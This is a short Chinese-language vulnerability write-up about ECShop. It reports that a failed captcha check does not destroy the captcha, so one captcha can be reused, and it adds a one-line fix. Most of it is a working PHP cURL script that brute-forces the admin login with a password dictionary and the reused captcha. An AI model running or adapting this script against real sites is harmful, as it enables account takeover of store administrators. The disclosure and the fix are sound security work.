ecshop绕过验证码暴力破解

若验证码不匹配，并没有销毁当前验证码

 

所以就可以一次请求验证码图片后，只要不再刷新验证码就可以一直使用 

1.获取正确的验证码

 

2.

 

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

<?php $site='http://ecshop.com'; $admin_path='/admin/privilege.php'; $captcha='上一步获取的验证码'; $referer=$site; function getH($url,$postdata=array()){ global $ch,$referer; $options = array( CURLOPT_URL =>   $url,                    CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true,                       CURLOPT_REFERER=>$referer,  //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=>array('Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1','Expect:'), CURLOPT_USERAGENT=>'ie'                 );             if(!empty($postdata)){ $options[CURLOPT_POSTFIELDS]=http_build_query($postdata); } $ret = curl_setopt_array($ch,$options); //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//返回一个字符串，而不是直接输出到浏览器   $ret = curl_exec($ch);       $info = curl_getinfo($ch);       if (empty($info['http_code'])) {         die("No HTTP code was returned");     } else if($info['http_code']==200) {//响应码为200         return $ret;         }else{         #var_dump($info);           echo '<br />';         echo ('响应码：'.$info['http_code']);//         echo '<br />';         echo $postdata['username'].'  ---'.$postdata['password'];         echo '<br />';     }     }   $url=$site.$admin_path; $data=array(     'username'=>'admin',     'password'=>'123456ad',     'captcha'=>$captcha,     'act'=>'signin'     ); //词典 $passwds=array('1','2','3','123456a','123456','123456ds'); foreach($passwds as $p){     $data['password']=$p;     $res= strip_tags(getH($url,$data));     if(stripos($res,'您输入的帐号信息不正确')){         echo 'no';     }     echo '<br>------------------------<br>'; }

修复方案：

验证识别后销毁session中的验证码